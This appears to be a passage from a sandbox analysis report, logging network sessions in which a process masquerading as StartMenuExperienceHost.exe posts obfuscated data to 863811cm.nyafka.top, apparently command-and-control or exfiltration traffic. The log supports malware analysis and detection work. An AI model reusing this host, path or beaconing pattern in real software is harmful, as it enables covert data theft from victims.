                                                                Oct 11, 2024 01:37:45.705271006 CEST1980OUTData Raw: 50 5a 5d 54 54 5a 58 50 5e 5a 55 58 51 5d 5a 52 57 5e 58 54 55 51 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZ]TTZXP^ZUXQ]ZRW^XTUQQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-Z<93T'>+#+<?!U4#W$[=S((A!1 X)#Y$/\*
                                                                Oct 11, 2024 01:37:45.966842890 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zomsLgzwNRLKIdLRhV4dWx7QGQ6dnVwUJgaNa82mL0ys%2Bcg39SousLmuqM83Swfpk4oTBQoNKBNRRxf8ske7uPqcaIgG0mAnpQKFdTS8Jcpj4UkvSSw8zjQPMA%2BfyCPDKgyBrFh8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70aaeb824331-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 28 39 00 53 37 3d 2f 11 2c 0f 38 12 2a 2d 03 01 2b 22 2f 58 32 24 30 00 2d 2f 3d 52 35 38 28 5c 2a 02 29 01 27 12 3b 5b 28 21 2a 51 03 1b 39 12 3f 23 2f 56 2b 32 39 16 28 1c 21 59 30 1d 36 18 2b 3d 25 57 33 00 2e 59 36 32 3b 0f 2a 3c 24 0c 2c 02 2f 45 3d 3b 2d 05 23 2b 2a 5f 08 13 3a 08 29 28 3b 08 21 51 25 5f 21 03 1e 0b 20 2a 3a 51 2a 2a 2e 1e 33 1d 3c 17 2c 22 28 5e 37 3c 3f 54 22 2c 04 1e 21 2d 02 5d 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y(9S7=/,8*-+"/X2$0-/=R58(\*)';[(!*Q9?#/V+29(!Y06+=%W3.Y62;*<$,/E=;-#+*_:)(;!Q%_! *:Q**.3<,"(^7<?T",!-]%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                120192.168.2.550102188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:43.662250996 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:44.018964052 CEST2584OUTData Raw: 50 5e 58 59 54 5d 58 5e 5e 5a 55 58 51 57 5a 5a 57 59 58 5c 55 50 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^XYT]X^^ZUXQWZZWYX\UPQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^<-(\?1X (5#(,(U!4'>4@ "/(;#Y$/\*)
                                                                Oct 11, 2024 01:37:44.105544090 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:44.282013893 CEST592INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg7jp1tMCPuuPcQe7jkRWp%2Bpm3PsAoCrPUtVh88ijrHrRKc5%2FdLkNp8qyz9OZgk2BzAYmFjLUFdbzWBanu4V03Twd3JKyPcJHTgl%2FJCenfqrsHBiFysWBAXtXOxIy83mvoT%2BSx90"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70a25cca41b5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:44.368356943 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                121192.168.2.550103188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:44.493326902 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:44.846905947 CEST2584OUTData Raw: 50 53 5d 5e 54 58 5d 56 5e 5a 55 58 51 56 5a 5c 57 51 58 59 55 57 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]^TX]V^ZUXQVZ\WQXYUWQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(3+9/2<?5'!;3[)09U#+R$T((/52$>;#Y$/\*-
                                                                Oct 11, 2024 01:37:44.967780113 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:45.334655046 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o8t7mfre72OygX3AiymHGNVZnWypolHIEGEBap%2B1uIFov4Sd1PLMj5RczjaThnsgd1rc6FCtKyT0LW%2BBWVKzMK2hrqzt7n9JJhayVQqgC6P%2BoRgjIQreXTKk%2F0Gy%2BIDUnyKdRvIX"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70a79c9f8cc0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                122192.168.2.550104188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:45.705435038 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:46.050250053 CEST2584OUTData Raw: 50 5c 5d 5e 54 59 58 55 5e 5a 55 58 51 57 5a 58 57 59 58 59 55 56 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]^TYXU^ZUXQWZXWYXYUVQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9](=$?'= *6/"'](#6480=.*(,A6/);#Y$/\*)
                                                                Oct 11, 2024 01:37:46.126727104 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:46.310863018 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99ywSpYN4CYKKSvNpPn7HXZ%2BE21JyGsYJxwNagV4u55paZC4eOEHgJCLgs%2B7SHaOIXDuYEvf1itQZ0w9lUGZAbrF0L9L%2Btm1vjWmNYFnLuVcQFuu9YpnDAfjVUvyz1Z0QSX%2BHVdH"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70af09bf42a0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                123192.168.2.550105188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:46.088238955 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:46.441391945 CEST2004OUTData Raw: 50 53 5d 5f 54 55 58 50 5e 5a 55 58 51 56 5a 58 57 5e 58 59 55 50 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]_TUXP^ZUXQVZXW^XYUPQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(,Z+9;R& C+5!(0+)U4+R3)86?>;#Y$/\*-
                                                                Oct 11, 2024 01:37:46.535514116 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:46.703624964 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOgdj7wGpC6XQUpzMfMZn26zLZoARq1%2BDQmpPuPY11eRAnckwojGLvgyrRpijNjpZ0JSEfXI6yPqHm%2BDBr7BqT3WSrX33xODKOJArGYO8dmHrK8aiYgtlFUe3Godo7covbb8ipmR"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b18b2142c0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 29 00 39 0e 37 3e 05 59 2c 57 20 10 2a 13 31 07 28 08 30 06 26 24 16 01 39 3c 29 1e 21 2b 0e 17 2a 3c 2d 03 24 05 2c 00 3f 1b 2a 51 03 1b 39 5b 2b 33 23 1e 3c 31 36 05 28 32 26 07 30 1d 14 1b 3e 2e 2e 0f 30 07 3e 5e 22 22 37 0c 29 02 3b 1f 2f 3b 02 18 2a 28 25 03 37 3b 2a 5f 08 13 3a 08 3e 5e 34 56 21 0e 35 17 23 2e 37 1e 20 29 25 09 3d 2a 26 55 24 30 27 05 38 22 0e 13 34 01 37 51 22 2c 32 1d 23 03 34 5a 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$)97>Y,W *1(0&$9<)!+*<-$,?*Q9[+3#<16(2&0>..0>^""7);/;*(%7;*_:>^4V!5#.7 )%=*&U$0'8"47Q",2#4Z1"_")Q?TR0
                                                                Oct 11, 2024 01:37:46.706984997 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:46.801528931 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:46.801675081 CEST540OUTData Raw: 55 5e 5d 5e 54 5b 58 56 5e 5a 55 58 51 5c 5a 5c 57 51 58 5b 55 52 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]^T[XV^ZUXQ\Z\WQX[URQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9([,\<)$2 A<$\!;(35T!' '.!*^' 1^*#Y$/\*
                                                                Oct 11, 2024 01:37:47.051328897 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0FN3kiUXGY4d3pvsN0r3Fiz3NA4kQioFTNNC%2BdveIujC9nZoUC7HnE14OLbUOStuN6DZj4hktw1RlivYnyyzo8ioInwReD20k4VN4AgxP09ZvZzMCBWpaPa66Ca2Y9i7fA2S8xGC"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b33c9f42c0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:47.057893991 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:47.293046951 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:47.293227911 CEST2004OUTData Raw: 50 5b 58 5d 54 5e 5d 53 5e 5a 55 58 51 57 5a 5b 57 5c 58 5f 55 5c 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[X]T^]S^ZUXQWZ[W\X_U\QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<-(]?\/S&='+%!+3[() $$-&*(62<^>;#Y$/\*)
                                                                Oct 11, 2024 01:37:47.589040041 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ImvYpc7MV%2BIvYrDqY5CkQX1x8R9%2FOXXGKR38QcKAD7iwFPxmpPCZ8IhzZtmvU9J%2BOSDtZHpiHbCfEoGcg381MTaypw5UxXrGfh570wltWNCxpqOmEDltAGvxxOnAzfn9tDfLRi%2F5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b56f4242c0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 2a 00 26 10 22 3e 37 5c 2f 31 02 5a 29 2d 21 06 28 0f 2b 13 32 0a 1a 01 3a 5a 21 11 35 15 0e 5e 3d 3c 04 12 33 02 2b 5b 3c 0b 2a 51 03 1b 39 5f 3c 0a 30 0e 2b 32 39 5d 28 0b 32 05 24 0a 3d 40 3e 3d 35 12 24 10 03 06 35 57 20 56 28 2f 20 0d 38 05 2b 0a 3e 06 07 02 23 11 2a 5f 08 13 39 55 2a 01 28 13 36 37 36 07 36 03 34 0a 22 07 0f 08 2a 29 2a 50 27 33 30 5d 38 22 3c 12 21 2c 33 55 23 2c 0f 0e 20 04 34 11 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*&">7\/1Z)-!(+2:Z!5^=<3+[<*Q9_<0+29](2$=@>=5$5W V(/ 8+>#*_9U*(67664"*)*P'30]8"<!,3U#, 41"_")Q?TR0
                                                                Oct 11, 2024 01:37:47.589309931 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----p3V6slVJ7hXe8d39XCGX37f04oKmGxfeiF
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3182
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:47.683212042 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:47.683417082 CEST3182OUTData Raw: 2d 2d 2d 2d 2d 2d 70 33 56 36 73 6c 56 4a 37 68 58 65 38 64 33 39 58 43 47 58 33 37 66 30 34 6f 4b 6d 47 78 66 65 69 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------p3V6slVJ7hXe8d39XCGX37f04oKmGxfeiFContent-Disposition: form-data; name="0"Content-Type: text/plainUZ]\T^XV^ZUXQTZ_WPX]U]Q]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:47.946580887 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:47 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uMzi7LR4UH4bghl%2BeWqqo1R0anJrU1lG4QhlZi7tp%2BynjA%2FCI1Dtmg%2B0N45aghKC3zCglAztRv3vMqYLsoXz6lwx1qXw%2FZG%2BAHdYdvVjJyXNJMxtaFuuHqtPEZCNUOvOkncjiT7t"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70b8ba6d42c0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:47.947777033 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:48.042040110 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:48.042277098 CEST2004OUTData Raw: 55 5f 5d 5e 54 5c 5d 51 5e 5a 55 58 51 53 5a 5e 57 5d 58 5b 55 52 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_]^T\]Q^ZUXQSZ^W]X[URQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9](=Y<)8%$<(_#(,+39U7B8&=>4A62;)#Y$/\*9
                                                                Oct 11, 2024 01:37:48.340665102 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MkqUgsujyfUBDKAUkkk3bIFVmuUG2yaXelqUzQKxg2eu6r94s0b%2FTHwpZwWVOBdLl4FW7OwnqJtI1ZT5xWJFSEaazpOf3Bx5AuApW4raO2fUKgQfQMTKLXoGaNfGIxjmjb1VK8sf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70bafd3142c0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 58 3e 17 2a 54 22 3e 33 5d 38 31 0e 1d 3e 04 39 06 3c 31 01 58 31 1a 2b 1a 39 2f 36 0e 23 3b 02 5f 3d 05 32 11 24 12 24 01 2b 0b 2a 51 03 1b 39 59 2b 20 2f 13 28 0c 2e 04 29 22 25 58 27 30 39 41 3e 3e 3d 1f 33 58 3d 04 22 0f 3c 1f 3e 12 2c 0d 2f 5d 34 19 29 01 22 11 37 01 2a 5f 08 13 3a 0c 3e 06 20 56 21 19 36 01 21 3e 2b 55 20 29 2a 1b 29 39 3a 13 33 30 2c 15 2f 22 20 59 20 11 0e 08 35 12 0c 56 20 3d 2b 01 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'X>*T">3]81>9<1X1+9/6#;_=2$$+*Q9Y+ /(.)"%X'09A>>=3X="<>,/]4)"7*_:> V!6!>+U )*)9:30,/" Y 5V =+&("_")Q?TR0
                                                                Oct 11, 2024 01:37:48.558330059 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:48.667035103 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:48.667253017 CEST2004OUTData Raw: 50 52 5d 5a 54 5f 5d 55 5e 5a 55 58 51 54 5a 5e 57 5f 58 5f 55 5c 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]ZT_]U^ZUXQTZ^W_X_U\Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(>3?9'U%-0D*%#+ ?3!4+P$&>85/=;#Y$/\*%
                                                                Oct 11, 2024 01:37:48.962912083 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:48 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RR59eqLPir4fawiDrX7CVgpwkbHKQ32u3clW6xppD7aYQN6JS4X3nXy6%2By05nvu0IXYyNztMWZDYPtxZ64i5S6YCWpXEUmrN4lC6xAfHbUqH0cOF2nttZQiZ2W9Z5Qgmz0rFc%2F5h"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70bec99042c0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 3d 39 21 0e 20 58 2b 58 2c 21 02 5a 3d 03 0c 5d 3f 0f 27 5a 31 24 16 07 3a 12 2e 0f 35 15 34 58 3e 3c 03 07 30 05 2b 59 3f 31 2a 51 03 1b 39 1c 3e 23 0a 08 28 1c 35 17 3f 32 3e 04 33 33 26 18 2b 2d 26 08 30 2e 3d 05 22 0f 06 11 29 2c 30 0e 3b 02 23 09 2a 06 08 1e 20 11 2a 5f 08 13 39 54 3d 01 37 09 22 0e 3e 07 36 3d 15 1d 22 29 26 1a 29 17 2a 1c 27 20 27 05 2c 32 05 00 37 11 20 0c 22 5a 2e 55 34 2e 2f 02 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
